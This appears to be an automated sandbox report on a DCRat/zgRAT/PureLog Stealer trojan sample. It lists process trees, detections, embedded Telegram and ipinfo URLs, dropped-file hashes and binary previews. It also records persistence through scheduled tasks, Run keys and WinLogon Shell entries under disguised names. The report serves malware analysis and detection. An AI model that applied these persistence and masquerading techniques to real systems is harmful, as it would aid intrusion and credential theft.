                               conhost.exe (started); cvtres.exe (started)
                             powershell.exe (started)
                               signature: Loading BitLocker PowerShell Module
                               conhost.exe (started)
                             18 other processes
                               conhost.exe (started, 3 instances); 17 other processes
                           XrtbrRarCSNElLBNKqySVVhxSZIi.exe (started)
                           XrtbrRarCSNElLBNKqySVVhxSZIi.exe (started)
                           4 other processes

                           Source | Detection | Scanner | Label
                           4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                           4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | 100% | Avira | TR/Spy.Agent.hwiyw
                           4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe | 100% | Joe Sandbox ML |
                           Source | Detection | Scanner | Label
                           C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe | 100% | Avira | TR/Spy.Agent.hwiyw
                           C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe | 100% | Avira | TR/Spy.Agent.hwiyw
                           C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe | 100% | Avira | TR/Spy.Agent.hwiyw
                           C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe | 100% | Avira | TR/Spy.Agent.hwiyw
                           C:\Users\user\AppData\Local\Temp\1ke8OVZbVo.bat | 100% | Avira | BAT/Delbat.C
                           C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe | 100% | Joe Sandbox ML |
                           C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe | 100% | Joe Sandbox ML |
                           C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe | 100% | Joe Sandbox ML |
                           C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | 100% | Joe Sandbox ML |
                           C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe | 100% | Joe Sandbox ML |
                           C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                           C:\Program Files (x86)\Windows Media Player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                           C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                           C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                           C:\Users\user\Desktop\HnmxfGsC.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                           C:\Users\user\Desktop\MaEvHCHq.log | 8% | ReversingLabs |
                           C:\Users\user\Desktop\WJYLrfNX.log | 4% | ReversingLabs |
                           C:\Users\user\Desktop\fsrbbHSF.log | 3% | ReversingLabs |
                           C:\Users\user\Desktop\oWARLBim.log | 17% | ReversingLabs | Win32.Trojan.Generic
                           C:\Users\user\Desktop\yEThvdnU.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                           C:\Users\user\Desktop\ynMPgItS.log | 29% | ReversingLabs |
                           C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                           No Antivirus matches
                           No Antivirus matches
                           Source | Detection | Scanner | Label
                           http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
                           http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
                           http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                           https://ipinfo.io/country | 0% | Avira URL Cloud | safe
                           https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
                           https://aka.ms/pscore68 | 0% | Avira URL Cloud | safe
                           https://api.telegram.org/bot | 0% | Avira URL Cloud | safe
                           http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe
                           https://ipinfo.io/ip | 0% | Avira URL Cloud | safe
                           http://schemas.xmlsoap.org/wsdl/ | 0% | Avira URL Cloud | safe
                          No contacted domains info
                           Name | Source | Malicious | Antivirus Detection | Reputation
                           https://ipinfo.io/country | 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1427464477.0000000002DF2000.00000002.00000001.01000000.00000000.sdmp, WJYLrfNX.log.0.dr | false | Avira URL Cloud: safe | unknown
                          https://aka.ms/pscore68powershell.exe, 00000025.00000002.1646778992.0000020000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1636346669.0000012E12081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1753292652.000001EA557A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1657659805.0000023B5E911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.1754802962.000002A942F21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1678127408.000001BE5C231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.1703064265.0000015F93C01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.1582628141.000002A780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1688856818.000002C680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1730168559.00000244B30D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1673180393.000001C89EC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1704908802.000001FF01561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1757598729.000001C49B1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.1731633842.000001F209931000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.1654488675.000002DF36E91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1674802007.0000019700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1680673760.000001CC1B7C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1677062673.00000255D00A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                           http://pesterbdd.com/images/Pester.png | powershell.exe, 00000044.00000002.1677062673.00000255D02C6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                           https://api.telegram.org/bot | 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1427464477.0000000002DF2000.00000002.00000001.01000000.00000000.sdmp, WJYLrfNX.log.0.dr | false | Avira URL Cloud: safe | unknown
                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000025.00000002.1646778992.0000020000228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1636346669.0000012E122A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1753292652.000001EA55A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1657659805.0000023B5EB35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.1754802962.000002A94320A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1678127408.000001BE5C455000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.1703064265.0000015F93E28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.1582628141.000002A780226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1688856818.000002C680228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1730168559.00000244B32F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1673180393.000001C89EE28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1704908802.000001FF01788000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1757598729.000001C49B3F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.1731633842.000001F209B59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.1654488675.000002DF370B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1674802007.0000019700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1680673760.000001CC1B9F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1677062673.00000255D02C6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1443899131.0000000003604000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1646778992.0000020000001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1636346669.0000012E12081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1753292652.000001EA557A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1657659805.0000023B5E911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.1754802962.000002A942F21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1678127408.000001BE5C231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.1703064265.0000015F93C01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.1582628141.000002A780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1688856818.000002C680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1730168559.00000244B30D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1673180393.000001C89EC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1704908802.000001FF01561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1757598729.000001C49B1D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.1731633842.000001F209931000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.1654488675.000002DF36E91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1674802007.0000019700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1680673760.000001CC1B7C1000.00000004.00000800.00020000.00000000.sdmp, 
powershell.exe, 00000044.00000002.1677062673.00000255D00A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                           http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000044.00000002.1677062673.00000255D02C6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                           https://github.com/Pester/Pester | powershell.exe, 00000044.00000002.1677062673.00000255D02C6000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000025.00000002.1646778992.0000020000228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.1636346669.0000012E122A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1753292652.000001EA55A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1657659805.0000023B5EB35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.1754802962.000002A94320A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.1678127408.000001BE5C455000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000030.00000002.1703064265.0000015F93E28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.1582628141.000002A780226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1688856818.000002C680228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.1730168559.00000244B32F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.1673180393.000001C89EE28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1704908802.000001FF01788000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.1757598729.000001C49B3F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.1731633842.000001F209B59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.1654488675.000002DF370B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.1674802007.0000019700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.1680673760.000001CC1B9F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1677062673.00000255D02C6000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                           https://ipinfo.io/ip | 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, 00000000.00000002.1427464477.0000000002DF2000.00000002.00000001.01000000.00000000.sdmp, WJYLrfNX.log.0.dr | false | Avira URL Cloud: safe | unknown
                          No contacted IP infos
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1510313
                          Start date and time:2024-09-12 20:16:06 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 10m 55s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:80
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Sample name:4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                          Detection:MAL
                          Classification:mal100.spre.troj.expl.evad.winEXE@79/114@0/0
                          EGA Information:Failed
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe, schtasks.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, 383852cm.n9shka.top, slscr.update.microsoft.com, ipinfo.io, ctldl.windowsupdate.com, time.windows.com, api.telegram.org, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, PID 6700 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                           Time | Type | Description
                           14:17:14 | API Interceptor | 528x Sleep call for process: powershell.exe modified
                           20:17:03 | Task Scheduler | Run new task: XrtbrRarCSNElLBNKqySVVhxSZIi path: "C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
                           20:17:03 | Task Scheduler | Run new task: XrtbrRarCSNElLBNKqySVVhxSZIiX path: "C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
                           20:17:05 | Task Scheduler | Run new task: RuntimeBroker path: "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe"
                           20:17:06 | Task Scheduler | Run new task: RuntimeBrokerR path: "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe"
                           20:17:08 | Task Scheduler | Run new task: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca path: "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe"
                           20:17:08 | Task Scheduler | Run new task: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca4 path: "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe"
                           20:17:10 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIi "C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
                           21:38:42 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe"
                           21:38:53 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe"
                           21:39:03 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIi "C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
                           21:39:12 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe"
                           21:39:22 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe"
                           21:39:31 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run XrtbrRarCSNElLBNKqySVVhxSZIi "C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
                           21:39:40 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe"
                           21:39:49 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe"
                           21:40:06 | Autostart | Run: WinLogon Shell "C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
                           21:40:15 | Autostart | Run: WinLogon Shell "C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe"
                           21:40:24 | Autostart | Run: WinLogon Shell "C:\Program Files (x86)\windows media player\Network Sharing\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
                           21:40:33 | Autostart | Run: WinLogon Shell "C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
                           21:40:42 | Autostart | Run: WinLogon Shell "C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
                           21:40:51 | Autostart | Run: WinLogon Shell "C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe"
                          No context
                          No context
                          No context
                          No context
                           Match | Associated Sample Name / URL | Detection | Threat Name
                           C:\Users\user\Desktop\HnmxfGsC.log | eRZQCpMb4y.exe | malicious | DCRat, PureLog Stealer, zgRAT
                            | 4BJoBHQ6T3.exe | malicious | DCRat, PureLog Stealer, zgRAT
                            | oG6R4bo1Rd.exe | malicious | DCRat, PureLog Stealer, zgRAT
                            | PCCooker2.0_x64.exe | malicious | AsyncRAT, DCRat, GuLoader, Lokibot, Njrat, PureLog Stealer, SilverRat
                            | kQ6mFXrgYq.exe | malicious | DCRat, PureLog Stealer, zgRAT
                            | kIdT4m0aa4.exe | malicious | DCRat, PureLog Stealer, zgRAT
                            | 7buiOqC9uM.exe | malicious | DCRat
                            | PQmAnagsLM.exe | malicious | DCRat, PureLog Stealer, zgRAT
                            | BN57miasVe.exe | malicious | DCRat, PureLog Stealer, zgRAT
                            | 5R28W1PAnS.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with very long lines (433), with no line terminators
                                              Category:dropped
                                              Size (bytes):433
                                              Entropy (8bit):5.868481435211121
                                              Encrypted:false
                                              SSDEEP:12:A5qJjDaBNljkg4tIOOJmhSmpMjtVr9Pp4DLe9:ZviN5kRmF8hV2jBp4+9
                                              MD5:5F338DC0BE2F7A24F39C3CB61F340C6A
                                              SHA1:31F4ED74EE52C8ECD4DA938704716589FF53D700
                                              SHA-256:EA001E09A7BA5CF2432EB4A9D5E8054CF7EDAEC84C25485F9ACF0F47E8A5E7EB
                                              SHA-512:370F073AAF1D0248C49265A50F4324E28E404585070106BCAE6B0EE0BC6C2B2037DE991144509963EB44DBE868CBCB20F2B193C36B4EB3A1E8C54C05D7ECEE7D
                                              Malicious:false
                                              Preview:h94srQ28bMfl5VeBP1GaGFJxPW5A9on0AN2fiOAQbpA4LLQIhWbLfdTbzGdVU29xipksd8dA109bFOmDFxcnNcUh3aqbup6ipNWgkipj2aToe1WkeZPgZWkFUDyCSCQM4aw12GdhH3uwIqDCEF6VZZITnQLhunQ0KHuEFesY6sYglx6nAv8NF5wfRcOl46wem3mB596jWiYrAmrzThg8oDvPUOwmPHeA544rL5sBzY0hgFfpuZRWZyzjIWrrMTTPEYvGsAnYzfJQMOsOtH20zHlHEViyOAyfElcIUY7uv3g3ojW4oc7FbdZ6wnCWbzKzqoMkvk4VJHF6lrdf8oKwDtDlLgVqWkT5trMAWvJDhm5UXdVFKhYxoYw7llYOOO8jxJM4ecIMeGOaysNsLQfzMgRV5PZuW4zSnVgNRakrYLShJVJ2X
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):2011136
                                              Entropy (8bit):7.569188314300448
                                              Encrypted:false
                                              SSDEEP:49152:dbmZsvFi8eKtbbrI5E6OmK0ETDZns1X/A4kAK:dbmZs9btb3IS6OBZs1vA4p
                                              MD5:B8AA70ED9243F5AA9C8DD45E8B6C01E7
                                              SHA1:8D871A1D93CC069413563D42DAD3F098F4AC5E5D
                                              SHA-256:4CEB69AFC05B1475459075F2CD5688F6AA8FE6A9FF6CAE0A25D742B650C62351
                                              SHA-512:D2DB111500BA7BC55F0913F888A38BA7B3986C2439FC0ABD0CCD7FEB4D4AC0D7863EDB28C903CCB78C1F59E8EB29CBC4132AB2977560C2A5C21F089BB5CA72A7
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 63%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f................................. ........@.. ....................... ............@.................................P...K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................,................................................0..........(.... ........8........E....M...).......N...8H...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8y......0..'....... ........8........E............j...F...............8........~....(J...~....(N... ....<g... ....~....{....9....& ....8....8N... ....~....{....9....& ....8u...8*... ....~....{h...:\...& ....8Q...r...ps....z*~....9@... ....81..
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              File Type:MSVC .res
                                              Category:dropped
                                              Size (bytes):1168
                                              Entropy (8bit):4.448520842480604
                                              Encrypted:false
                                              SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                              MD5:B5189FB271BE514BEC128E0D0809C04E
                                              SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                              SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                              SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                              Malicious:false
                                              Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro
                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):4608
                                              Entropy (8bit):3.9474842783538895
                                              Encrypted:false
                                              SSDEEP:48:6QmZtw+xZ8RxeOAkFJOcV4MKe28dAd+vqBHjuulB+hnqXSfbNtm:CGxvxVx9VvkVTkZzNt
                                              MD5:A715B6D4BFE04F8366D94AB4E851E810
                                              SHA1:C2C69BA1C060D03688F6877D0E00869080C57F30
                                              SHA-256:1448AD0AFAE3EBD6DD2FE39C6957187605D82FADC178C44FFB72A61254AF70B3
                                              SHA-512:238AF3BBF131DB2836D421B49D7382A677171A4331ACF677F6D8E2C45CAC38388D3BEA881699F70076781869A882C4343AB19FC5FDE8B146478F14B6932BE4AD
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.f.............................'... ...@....@.. ....................................@..................................'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..`.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.0.......#GUID...@... ...#Blob...........WU........%3................................................................
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):74
                                              Entropy (8bit):5.3206096154827724
                                              Encrypted:false
                                              SSDEEP:3:W+kkv4DWTIkYdlhk2IlXhk:XkkvO3LldGhk
                                              MD5:945A2AA8DD930E9825395826839FE97A
                                              SHA1:F00328487095322ED8F7BD0C80A3CA855AE2B8DD
